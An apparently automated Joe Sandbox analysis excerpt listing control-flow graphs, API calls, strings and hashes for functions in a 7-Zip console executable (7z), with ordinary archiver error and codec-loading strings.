f83af3-f83b18 call f986a8 _CxxThrowException 2573->2576 2574->2573 2583 f83b4a-f83b7f GetLastError call f739f0 call f76d34 call f739ac free 2575->2583 2584 f83b84-f83b92 call f73920 free 2575->2584 2576->2575 2583->2584 2584->2548
                              APIs
                              Strings
                              • Unsupported switch postfix -stm, xrefs: 00F83AF6
                              • : ERROR : , xrefs: 00F83B52
                              • Set process affinity mask: , xrefs: 00F83AAE
                              • SeLockMemoryPrivilege, xrefs: 00F83A60
                              • Unsupported switch postfix for -slp, xrefs: 00F83A26
                              • SeCreateSymbolicLinkPrivilege, xrefs: 00F839BB
                              • Unsupported switch postfix -bb, xrefs: 00F83958
                              • SeRestorePrivilege, xrefs: 00F839AD
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrow$_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                              • String ID: : ERROR : $SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                              • API String ID: 1978914637-1912842784
                              • Opcode ID: e7f2b4835cd6f56cb91759103e716ae9380ec5db3458876911303f3e00291719
                              • Instruction ID: 1c9a30e93d76f32bf546064fdaaeb5d3dfa6d4da71d05a4404453c1af8537af2
                              • Opcode Fuzzy Hash: e7f2b4835cd6f56cb91759103e716ae9380ec5db3458876911303f3e00291719
                              • Instruction Fuzzy Hash: 97C17A336046C19ADB61EF25D8803AC7B62F795F94F488126EA8D47B35CF38CA95E701
                              Function 00F788EC Relevance: 37.2, APIs: 18, Strings: 3, Instructions: 488COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2593 f788ec-f78911 2594 f78913-f78917 2593->2594 2595 f78919-f7891e 2593->2595 2594->2595 2596 f7896f-f78979 call f7ac10 2594->2596 2597 f78927-f7892f 2595->2597 2598 f78920-f78925 2595->2598 2604 f78a5f-f78a6b call f7ae80 2596->2604 2605 f7897f-f789b9 call f73730 call f7ad8c 2596->2605 2597->2596 2599 f78931-f78935 2597->2599 2598->2596 2598->2597 2599->2596 2601 f78937-f7896a call f73730 2599->2601 2610 f79051-f7905c 2601->2610 2612 f78a71-f78a78 2604->2612 2613 f78ce8-f78d1e call f7adac call f7abe4 2604->2613 2618 f78a1e-f78a3a call f79fc4 2605->2618 2619 f789bb-f789bf 2605->2619 2612->2613 2615 f78a7e-f78a9f call f735b8 * 2 2612->2615 2630 f78d24-f78d2b 2613->2630 2631 f78db9-f78dbd 2613->2631 2640 f78aa1-f78aaa 2615->2640 2641 f78aae-f78ab3 2615->2641 2634 f78a3e-f78a42 2618->2634 2635 f78a3c 2618->2635 2619->2618 2622 f789c1-f78a0a call f7bc48 2619->2622 2622->2618 2639 f78a0c-f78a19 2622->2639 2630->2631 2638 f78d31-f78d40 call f786c8 2630->2638 2636 f78dbf-f78dc3 2631->2636 2637 f78dc9-f78dcd 2631->2637 2643 f78a44-f78a49 2634->2643 2644 f78a4c 2634->2644 2642 f78a4e-f78a5a call f7960c 2635->2642 2636->2637 2645 f78ff5-f79012 call f78318 2636->2645 2646 f78e36-f78e40 call f7ad28 2637->2646 2647 f78dcf-f78de1 call f786c8 2637->2647 2638->2645 2660 f78d46-f78d4f 2638->2660 2639->2610 2640->2641 2649 f78ab5-f78ad1 call f72a70 2641->2649 2650 f78ad3-f78adf call f739f0 2641->2650 2642->2610 2643->2644 2644->2642 2668 f79014-f79016 2645->2668 2669 f79041-f79049 call f782ec 2645->2669 2646->2645 2670 f78e46-f78e50 2646->2670 2647->2645 2666 f78de7-f78df0 2647->2666 2649->2650 2664 f78ae4-f78af5 call f7ad8c 2649->2664 2650->2664 2660->2645 2667 f78d55-f78d88 call f73730 2660->2667 2677 f78af7-f78afa 2664->2677 2678 f78b44-f78b56 call f788ec 2664->2678 2666->2645 2673 f78df6-f78e31 call f782ec 2666->2673 2687 f78d8a-f78d95 2667->2687 2688 f78d99-f78db4 call f78770 call f782ec 2667->2688 2668->2669 2675 f79018-f79021 2668->2675 2679 f7904e 2669->2679 2670->2645 2676 f78e56-f78e60 call f7ab3c 2670->2676 2673->2610 2675->2669 2682 f79023-f7903f call f78770 call f782ec 2675->2682 2676->2645 2692 f78e66-f78e73 call f78770 2676->2692 2684 f78afc-f78aff 2677->2684 2685 f78b08-f78b36 2677->2685 2694 f78b5c-f78ba3 call f736a8 call f7354c call f78680 2678->2694 2702 f78cd3-f78ce3 free * 2 2678->2702 2679->2610 2682->2610 2684->2678 2693 f78b01-f78b06 2684->2693 2685->2694 2695 f78b38-f78b42 call f73798 2685->2695 2687->2688 2688->2610 2710 f78e96-f78eac call f735b8 2692->2710 2711 f78e75-f78e91 call f73730 call f782ec 2692->2711 2693->2678 2693->2685 2724 f78bf5-f78c20 free * 2 call f782ec free 2694->2724 2725 f78ba5-f78bac 2694->2725 2695->2694 2702->2613 2722 f78eae-f78eb8 call f732b0 2710->2722 2723 f78ebc-f78ed7 2710->2723 2711->2610 2722->2723 2728 f78ee7-f78f1c call f78318 2723->2728 2729 f78ed9-f78ee3 call f732b0 2723->2729 2745 f78cc2-f78cce free 2724->2745 2732 f78c25-f78c5c SetLastError free * 2 call f782ec free 2725->2732 2733 f78bae-f78bbf call f728e8 2725->2733 2742 f78f76-f78f90 call f786c8 2728->2742 2743 f78f1e-f78f3c wcscmp 2728->2743 2729->2728 2732->2745 2748 f78bc5-f78bf3 free call f7354c call f78680 2733->2748 2749 f78c5e-f78c65 2733->2749 2760 f78fa7-f78ff3 call f73730 free call f782ec 2742->2760 2761 f78f92-f78f94 2742->2761 2746 f78f6e 2743->2746 2747 f78f3e-f78f69 call f73730 free call f782ec 2743->2747 2745->2610 2746->2742 2747->2610 2748->2724 2748->2725 2751 f78c67-f78c6c 2749->2751 2752 f78c7b-f78cc0 call f739ac free * 2 call f782ec free 2749->2752 2751->2752 2756 f78c6e-f78c77 2751->2756 2752->2745 2756->2752 2760->2610 2762 f78f96-f78f99 2761->2762 2763 f78f9b-f78fa5 free 2761->2763 2762->2760 2762->2763 2763->2645
                              APIs
                                • Part of subcall function 00F735B8: memmove.MSVCRT ref: 00F735F0
                              • free.MSVCRT ref: 00F78BCA
                              • free.MSVCRT ref: 00F78BFA
                              • free.MSVCRT ref: 00F78C05
                              • free.MSVCRT ref: 00F78C1A
                              • free.MSVCRT ref: 00F78CC7
                                • Part of subcall function 00F788EC: SetLastError.KERNEL32 ref: 00F78C2A
                                • Part of subcall function 00F788EC: free.MSVCRT ref: 00F78C36
                                • Part of subcall function 00F788EC: free.MSVCRT ref: 00F78C41
                                • Part of subcall function 00F788EC: free.MSVCRT ref: 00F78C56
                                • Part of subcall function 00F788EC: free.MSVCRT ref: 00F78CD8
                                • Part of subcall function 00F788EC: free.MSVCRT ref: 00F78CE3
                              • free.MSVCRT ref: 00F78C9A
                              • free.MSVCRT ref: 00F78CA5
                              • free.MSVCRT ref: 00F78CBA
                              • wcscmp.MSVCRT ref: 00F78F34
                              • free.MSVCRT ref: 00F78F54
                              • free.MSVCRT ref: 00F78FA0
                                • Part of subcall function 00F73730: free.MSVCRT ref: 00F7376A
                                • Part of subcall function 00F73730: memmove.MSVCRT(00000000,?,?,00000000,00F710B0), ref: 00F73785
                              • free.MSVCRT ref: 00F78FDE
                                • Part of subcall function 00F782EC: FindClose.KERNELBASE ref: 00F782FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove$CloseErrorFindLastwcscmp
                              • String ID: :$:$DATA$\
                              • API String ID: 2757989841-1004618218
                              • Opcode ID: 684f0238800f49a8f2224511bac49db6db9c33bf41c8a873e7da94822aca7b48
                              • Instruction ID: 86b713ca5be1c98421688c2077ac8cf6c5ad2000bbec581c36a3d4b31a9c981a
                              • Opcode Fuzzy Hash: 684f0238800f49a8f2224511bac49db6db9c33bf41c8a873e7da94822aca7b48
                              • Instruction Fuzzy Hash: BB12047254868096CB60EF29D89026DB771F395790F80C11BE78E87B64DF38C5A7EB06
                              Function 00F8728C Relevance: 31.8, APIs: 17, Strings: 4, Instructions: 276COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2775 f8728c-f872df call f78290 call f7354c call f788ec 2782 f875f9-f87605 call f7ae80 2775->2782 2783 f872e5-f872e9 2775->2783 2794 f8760b-f87616 2782->2794 2795 f876a3-f876b3 free 2782->2795 2785 f872eb 2783->2785 2786 f872f0-f872f3 2783->2786 2788 f875e5-f875f4 free 2785->2788 2789 f872f9-f873ac call f73b28 call f85f40 call f734d0 free 2786->2789 2790 f8744b-f8744f 2786->2790 2793 f876b5-f876c2 2788->2793 2844 f873ae-f873bc free 2789->2844 2845 f873c1-f873ca 2789->2845 2791 f87490-f87494 2790->2791 2792 f87451-f8745b call f7e70c 2790->2792 2799 f8749a-f874b4 call f736a8 call f7e70c 2791->2799 2800 f87562-f8756e 2791->2800 2809 f8745d-f87471 call f86e00 2792->2809 2810 f87484-f8748b 2792->2810 2794->2795 2798 f8761c-f8762e call f736a8 2794->2798 2795->2793 2820 f8763d-f8766f call f78290 call f7354c call f788ec 2798->2820 2821 f87630-f87639 2798->2821 2829 f874f5-f87504 call f77130 2799->2829 2830 f874b6-f874cc call f86e00 2799->2830 2802 f8759c-f875a6 call f79164 2800->2802 2803 f87570-f8757a call f77088 2800->2803 2802->2795 2827 f875ac-f875b6 call f77474 2802->2827 2803->2795 2825 f87580-f87594 call f86e88 2803->2825 2832 f8747a-f8747f 2809->2832 2833 f87473-f87475 2809->2833 2810->2795 2863 f8768b-f8769e free * 2 2820->2863 2864 f87671-f8767b 2820->2864 2821->2820 2847 f8759a 2825->2847 2848 f87596-f87598 2825->2848 2827->2795 2841 f875bc-f875c5 GetLastError 2827->2841 2855 f87553-f8755d free 2829->2855 2856 f87506-f8752a call f795e0 call f86f80 2829->2856 2851 f874ce-f874db free 2830->2851 2852 f874e0-f874f0 free 2830->2852 2832->2788 2833->2788 2841->2795 2849 f875cb-f875df call f86e88 2841->2849 2844->2788 2853 f873cc-f873ce 2845->2853 2854 f87441-f87446 free 2845->2854 2847->2788 2848->2788 2849->2788 2868 f875e1-f875e3 2849->2868 2851->2788 2852->2788 2859 f8743a 2853->2859 2860 f873d0-f873d2 2853->2860 2854->2790 2855->2795 2880 f8752c-f87539 free 2856->2880 2881 f8753e-f8754e free 2856->2881 2859->2854 2865 f8742a-f87435 free 2860->2865 2866 f873d4-f873d6 2860->2866 2863->2795 2864->2863 2869 f8767d-f87685 call f76fcc 2864->2869 2865->2788 2870 f873d8-f873da 2866->2870 2871 f87413-f87425 free 2866->2871 2868->2788 2877 f8768a 2869->2877 2874 f8740a-f87411 2870->2874 2875 f873dc-f873de 2870->2875 2871->2788 2874->2854 2878 f873e0-f873f0 free 2875->2878 2879 f873f5-f87405 free 2875->2879 2877->2863 2878->2788 2879->2788 2880->2788 2881->2788
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: Cannot create file with auto name$Cannot delete output file$Cannot delete output folder$Cannot rename existing file
                              • API String ID: 1294909896-3443351061
                              • Opcode ID: 7015291d19cea9615b8cd146ea9ca66bc542f039213e21b23768e11c5d6aef03
                              • Instruction ID: c9154ff847047c027d5b722fa7991a14c0b7389501716193e25d0601920706b3
                              • Opcode Fuzzy Hash: 7015291d19cea9615b8cd146ea9ca66bc542f039213e21b23768e11c5d6aef03
                              • Instruction Fuzzy Hash: 92A1926321CB8582DB60FB25E8913EEB361F7C5790F644122EB8E8B619DE6DC845F701
                              Function 00FC3C48 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 226COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2882 fc3c48-fc3c79 2883 fc3f9f 2882->2883 2884 fc3c7f 2882->2884 2885 fc3fa1-fc3fb4 2883->2885 2886 fc3c82-fc3cbe fputs call fc2ad0 2884->2886 2889 fc3cc0-fc3cc4 2886->2889 2890 fc3d12-fc3d16 2886->2890 2893 fc3cc6-fc3cde fputs call f724c4 2889->2893 2894 fc3ce0-fc3d0d call f735b8 call fc2d88 free 2889->2894 2891 fc3d18-fc3d1f 2890->2891 2892 fc3d21-fc3d2c 2890->2892 2897 fc3d30-fc3d58 call fc2ad0 call fc2e04 2891->2897 2892->2897 2893->2890 2894->2890 2906 fc3d8d-fc3da4 call fc2cf0 2897->2906 2907 fc3d5a-fc3d88 fputs * 2 call f725dc call f724c4 2897->2907 2906->2885 2913 fc3daa-fc3db1 2906->2913 2907->2906 2914 fc3de6-fc3df6 2913->2914 2915 fc3db3-fc3de1 fputs * 2 call f7263c call f724c4 2913->2915 2914->2885 2920 fc3dfc-fc3e02 2914->2920 2915->2914 2921 fc3e69-fc3e73 2920->2921 2922 fc3e04-fc3e33 2920->2922 2923 fc3e79-fc3e9a fputs 2921->2923 2924 fc3f54-fc3f68 2921->2924 2927 fc3e39-fc3e49 call fc2cf0 2922->2927 2928 fc3f70 2922->2928 2923->2924 2932 fc3ea0-fc3eb3 2923->2932 2924->2886 2926 fc3f6e 2924->2926 2926->2883 2933 fc3e4e-fc3e50 2927->2933 2931 fc3f74-fc3f81 SysFreeString 2928->2931 2931->2885 2932->2924 2934 fc3eb9-fc3eea 2932->2934 2935 fc3e56-fc3e67 SysFreeString 2933->2935 2936 fc3f72 2933->2936 2938 fc3ef0-fc3f19 2934->2938 2939 fc3f83 2934->2939 2935->2921 2935->2922 2936->2931 2942 fc3f1b-fc3f4e call fc2b78 call f7be6c SysFreeString 2938->2942 2943 fc3f85-fc3f8f call f7be6c 2938->2943 2940 fc3f90-fc3f9d SysFreeString 2939->2940 2940->2885 2942->2924 2942->2934 2943->2940
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$FreeString$fputcfree
                              • String ID: = $--$----$Path$Type$Warning: The archive is open with offset
                              • API String ID: 2701146716-1919703766
                              • Opcode ID: 5777e09c41b7440bff6cea8e59cbf97792d8b106f0deddf715476f13273d11e4
                              • Instruction ID: 04a3ffbc9260fe1ff1d1da34ba99093c58e4045e80ba3829f5c8e5dd2b978b9a
                              • Opcode Fuzzy Hash: 5777e09c41b7440bff6cea8e59cbf97792d8b106f0deddf715476f13273d11e4
                              • Instruction Fuzzy Hash: 71914B36614A4682CB54DF26EA55B6E7331F785BD4F40902BEE4E47B28DF38C949E700
                              Function 00FCA6E3 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 149COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2950 fca6e3-fca6ef 2951 fca736-fca73e 2950->2951 2952 fca6f1-fca6f9 2950->2952 2954 fca790-fca798 2951->2954 2955 fca740-fca742 2951->2955 2952->2951 2953 fca6fb-fca72f call f724c4 fputs call f7263c call f724c4 2952->2953 2953->2951 2957 fca79b-fca7a9 2954->2957 2958 fca778-fca781 2955->2958 2959 fca744-fca773 call f724c4 fputs call f7263c call f724c4 2955->2959 2962 fca7dc-fca7f8 free 2957->2962 2963 fca7ab 2957->2963 2958->2957 2959->2958 2967 fca7fa 2962->2967 2968 fca82b-fca850 free 2962->2968 2966 fca7af-fca7c5 2963->2966 2972 fca7d7-fca7da 2966->2972 2973 fca7c7-fca7d2 free * 2 2966->2973 2974 fca7fe-fca814 2967->2974 2976 fca860-fca863 2968->2976 2977 fca852-fca859 2968->2977 2972->2962 2972->2966 2973->2972 2979 fca826-fca829 2974->2979 2980 fca816-fca821 free * 2 2974->2980 2983 fca865-fca881 _CxxThrowException 2976->2983 2984 fca882-fca89d free 2976->2984 2977->2976 2982 fca85b 2977->2982 2979->2968 2979->2974 2980->2979 2986 fca85b call fc6550 2982->2986 2983->2984 2987 fca8bd-fca8dc free call fa8b60 call fc738c 2984->2987 2988 fca89f 2984->2988 2986->2976 2993 fca8e1-fca918 free call f71874 call fc7ec8 2987->2993 2989 fca8a3-fca8bb free 2988->2989 2989->2987 2989->2989 2998 fca94a-fca96b free 2993->2998 2999 fca91a 2993->2999 3000 fca91e-fca934 2999->3000 3001 fca946-fca948 3000->3001 3002 fca936-fca941 free * 2 3000->3002 3001->2998 3001->3000 3002->3001
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$fputs$ExceptionThrowfputc
                              • String ID: Errors: $Warnings:
                              • API String ID: 437615013-2345102087
                              • Opcode ID: 668692734a17d19e7b2f0b9b2458cdc2a1662e5a478cecb4249052460f7108dc
                              • Instruction ID: 8f8469ebe4b98e2a53faa5735a3fb2f58a8128643813e26d9ff6aeea7a7f20ea
                              • Opcode Fuzzy Hash: 668692734a17d19e7b2f0b9b2458cdc2a1662e5a478cecb4249052460f7108dc
                              • Instruction Fuzzy Hash: 3C51F9167046CA81DAB0EB25ED927AD7321FBC1BA4F448127CA8D07B59CF3DC842A712
                              Function 00FA9944 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 306libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3003 fa9944-fa997a 3004 fa99a9-fa99b7 3003->3004 3005 fa997c 3003->3005 3007 fa99b9 3004->3007 3008 fa99ef-fa9a11 3004->3008 3006 fa9980-fa9992 3005->3006 3012 fa99a4-fa99a7 3006->3012 3013 fa9994-fa999f call fa1784 free 3006->3013 3009 fa99bd-fa99cf 3007->3009 3010 fa9c87-fa9cce call fa70ac call f73504 call fa93b8 free 3008->3010 3011 fa9a17 3008->3011 3014 fa99ea-fa99ed 3009->3014 3015 fa99d1-fa99e5 free * 3 3009->3015 3031 fa9cd0 3010->3031 3032 fa9cd5-fa9cdd 3010->3032 3016 fa9a1e-fa9ad4 call f7354c call f738a8 call f7354c * 2 3011->3016 3012->3004 3012->3006 3013->3012 3014->3008 3014->3009 3015->3014 3041 fa9ae0-fa9ae7 3016->3041 3042 fa9ad6-fa9adb call f738a8 3016->3042 3033 fa9de7-fa9e06 free 3031->3033 3034 fa9cef-fa9d20 call f73504 call fa96f8 free 3032->3034 3035 fa9cdf-fa9cea call f73730 3032->3035 3051 fa9d22 3034->3051 3052 fa9d27-fa9d44 call f73504 call fa96f8 3034->3052 3035->3034 3043 fa9ae9-fa9af1 call f738a8 3041->3043 3044 fa9af6-fa9b55 call fa8580 free * 2 3041->3044 3042->3041 3043->3044 3053 fa9b71-fa9b75 3044->3053 3054 fa9b57-fa9b6c call fa8798 3044->3054 3051->3033 3065 fa9d49-fa9d58 free 3052->3065 3057 fa9b7b-fa9b98 call fb5a44 call f72350 3053->3057 3058 fa9c23-fa9c41 call fb5a44 call f72350 3053->3058 3054->3058 3079 fa9b9a-fa9ba1 3057->3079 3080 fa9ba3 3057->3080 3076 fa9c43-fa9c53 call fa18a8 3058->3076 3077 fa9c55 3058->3077 3068 fa9d5a 3065->3068 3069 fa9d5f-fa9d69 3065->3069 3068->3033 3071 fa9d6b-fa9d6f 3069->3071 3072 fa9d71-fa9d74 3069->3072 3075 fa9d83-fa9d87 3071->3075 3072->3075 3078 fa9d76-fa9d7d 3072->3078 3084 fa9d89-fa9d8f 3075->3084 3085 fa9dd0-fa9de4 call fa7d18 3075->3085 3086 fa9c58-fa9c81 call fa1784 3076->3086 3077->3086 3078->3075 3083 fa9d7f 3078->3083 3081 fa9ba6-fa9bd1 3079->3081 3080->3081 3087 fa9c03-fa9c06 3081->3087 3088 fa9bd3-fa9bd9 3081->3088 3083->3075 3084->3085 3090 fa9d91 3084->3090 3085->3033 3086->3010 3086->3016 3098 fa9c08-fa9c19 memmove 3087->3098 3099 fa9c20 3087->3099 3094 fa9bdb-fa9be0 free 3088->3094 3095 fa9be7-fa9bf2 3088->3095 3096 fa9d94-fa9db3 GetProcAddress 3090->3096 3094->3095 3100 fa9c1b-fa9c1e 3095->3100 3101 fa9bf4-fa9bff call f72350 3095->3101 3102 fa9dbf-fa9dc8 3096->3102 3103 fa9db5-fa9dbd 3096->3103 3098->3058 3099->3058 3100->3058 3101->3087 3102->3096 3105 fa9dca 3102->3105 3103->3102 3108 fa9dcc-fa9dce 3103->3108 3105->3085 3108->3033
                              APIs
                              • free.MSVCRT ref: 00FA999F
                              • free.MSVCRT ref: 00FA99D5
                              • free.MSVCRT ref: 00FA99DD
                              • free.MSVCRT ref: 00FA99E5
                              • free.MSVCRT ref: 00FA9B16
                              • free.MSVCRT ref: 00FA9B21
                              • free.MSVCRT ref: 00FA9BDB
                              • memmove.MSVCRT(?), ref: 00FA9C11
                              • free.MSVCRT ref: 00FA9CC6
                              • free.MSVCRT ref: 00FA9DEC
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17B7
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17BF
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17CC
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17F8
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA1801
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA1809
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA1816
                              • free.MSVCRT ref: 00FA9D18
                                • Part of subcall function 00F73730: free.MSVCRT ref: 00F7376A
                                • Part of subcall function 00F73730: memmove.MSVCRT(00000000,?,?,00000000,00F710B0), ref: 00F73785
                              • free.MSVCRT ref: 00FA9D50
                              • GetProcAddress.KERNEL32 ref: 00FA9DA6
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove$AddressProc
                              • String ID: 7z.dll$Codecs$Formats$SetCodecs
                              • API String ID: 4053071709-3422688593
                              • Opcode ID: 9b75bb26663778e9c1f1fde4bbcc52b498a23a9330953f2d16202b641fe49834
                              • Instruction ID: da8b3cfb203682f8ef2a6feb087d7033602c0103b1b13c32a67cf6feb0da11e3
                              • Opcode Fuzzy Hash: 9b75bb26663778e9c1f1fde4bbcc52b498a23a9330953f2d16202b641fe49834
                              • Instruction Fuzzy Hash: F7C1D676608B8192CB60EB21E8803AFB760F386798F544126DBCE47B15CF7DD469E701
                              Function 00F9C0C8 Relevance: 28.8, APIs: 17, Strings: 2, Instructions: 309COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3109 f9c0c8-f9c157 call f99be0 call f9bf1c memmove 3114 f9c159-f9c16d call f9c044 free 3109->3114 3115 f9c172-f9c185 3109->3115 3122 f9c53d-f9c550 3114->3122 3117 f9c18b 3115->3117 3118 f9c221-f9c22e call f9c044 3115->3118 3121 f9c18e-f9c1a2 3117->3121 3126 f9c230-f9c255 call f986a8 _CxxThrowException 3118->3126 3127 f9c256-f9c268 3118->3127 3124 f9c213-f9c21b 3121->3124 3125 f9c1a4-f9c1d6 call f98c88 call fb5a44 call f72350 3121->3125 3124->3118 3124->3121 3148 f9c1e8 3125->3148 3149 f9c1d8-f9c1e6 call f736a8 3125->3149 3126->3127 3131 f9c26a-f9c26d 3127->3131 3132 f9c2e7-f9c314 call fb51a8 3127->3132 3133 f9c26f-f9c2a7 call f7354c call f77544 call fb5a44 call f72350 3131->3133 3141 f9c342-f9c368 call f7dae0 3132->3141 3142 f9c316 3132->3142 3173 f9c2a9-f9c2b9 call f736a8 3133->3173 3174 f9c2bb 3133->3174 3157 f9c36a 3141->3157 3158 f9c396-f9c3ad call f7dae0 3141->3158 3145 f9c31a-f9c32b 3142->3145 3150 f9c33d-f9c340 3145->3150 3151 f9c32d-f9c338 free * 2 3145->3151 3156 f9c1eb-f9c20c free 3148->3156 3149->3156 3150->3141 3150->3145 3151->3150 3156->3124 3161 f9c36e-f9c37f 3157->3161 3168 f9c3b3-f9c3b6 3158->3168 3169 f9c4b6-f9c4cc free 3158->3169 3164 f9c391-f9c394 3161->3164 3165 f9c381-f9c38c free * 2 3161->3165 3164->3158 3164->3161 3165->3164 3170 f9c3b9-f9c3dc call f72350 3168->3170 3171 f9c4fc-f9c50a free 3169->3171 3172 f9c4ce 3169->3172 3187 f9c3ee 3170->3187 3188 f9c3de-f9c3ec call f736a8 3170->3188 3178 f9c50f-f9c51c 3171->3178 3176 f9c4d2-f9c4e5 3172->3176 3179 f9c2be-f9c2e5 free 3173->3179 3174->3179 3181 f9c4f7-f9c4fa 3176->3181 3182 f9c4e7-f9c4f2 free * 2 3176->3182 3184 f9c52e-f9c531 3178->3184 3185 f9c51e-f9c529 free * 2 3178->3185 3179->3132 3179->3133 3181->3171 3181->3176 3182->3181 3184->3178 3186 f9c533-f9c53b free 3184->3186 3185->3184 3186->3122 3190 f9c3f1-f9c42a call f72350 3187->3190 3188->3190 3194 f9c43c 3190->3194 3195 f9c42c-f9c43a call f736a8 3190->3195 3197 f9c43f-f9c452 3194->3197 3195->3197 3199 f9c470-f9c47e 3197->3199 3200 f9c454-f9c46e call f74ee4 3197->3200 3199->3170 3202 f9c484 3199->3202 3200->3199 3204 f9c486-f9c4b5 call f986a8 _CxxThrowException 3200->3204 3202->3169 3204->3169
                              APIs
                                • Part of subcall function 00F9BF1C: free.MSVCRT ref: 00F9BFDB
                              • memmove.MSVCRT ref: 00F9C14F
                              • free.MSVCRT ref: 00F9C166
                              • free.MSVCRT ref: 00F9C207
                              • _CxxThrowException.MSVCRT ref: 00F9C250
                              • free.MSVCRT ref: 00F9C2D9
                                • Part of subcall function 00F9C044: free.MSVCRT ref: 00F9C057
                                • Part of subcall function 00F9C044: free.MSVCRT ref: 00F9C072
                                • Part of subcall function 00F9C044: free.MSVCRT ref: 00F9C07B
                                • Part of subcall function 00F9C044: free.MSVCRT ref: 00F9C0A6
                                • Part of subcall function 00F9C044: free.MSVCRT ref: 00F9C0AE
                              Strings
                              Memory Dump Source
